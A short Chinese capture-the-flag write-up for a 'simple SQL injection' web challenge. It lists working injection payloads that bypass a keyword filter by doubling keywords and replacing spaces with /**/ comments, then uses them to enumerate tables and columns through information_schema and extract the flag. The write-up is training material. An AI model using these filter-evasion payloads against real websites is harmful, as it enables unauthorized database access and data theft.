实验吧-web-简单的sql注入

简单的注入测试

1   正常
1'  无回显
1' or '1'='1    全部数据
测试过滤：
union select 
information_schema 
information_schema.tables 
information_schema.columns
table_schema
column_name
发现都被过滤了

重复输入union select后发现空格也被过滤了，用两个空格代替一个空格或用对注释符/**/绕过
1.查询当前数据库

1'  unionunion  selectselect  database()'  <两个空格>

1'/**/union/**/select/**/database()'

图片.png
2.查询数据库中的表

1'  unionunion  selectselect  table_name  fromfrom  information_schema.tables  wherewhere  '1'='1   <两个空格>

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

图片.png
发现flag表
3.查询flag表中字段名

1' unionunion  selectselect  column_namcolumn_namee  fromfrom  information_schema.coluinformation_schema.columnsmns  wherewhere  table_name='flag    <两个空格>

图片.png
发现flag字段名
4.最后构造出poc

1'  unionunion  selectselect  flag  fromfrom  flag  wherewhere  '1'='1
1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

图片.png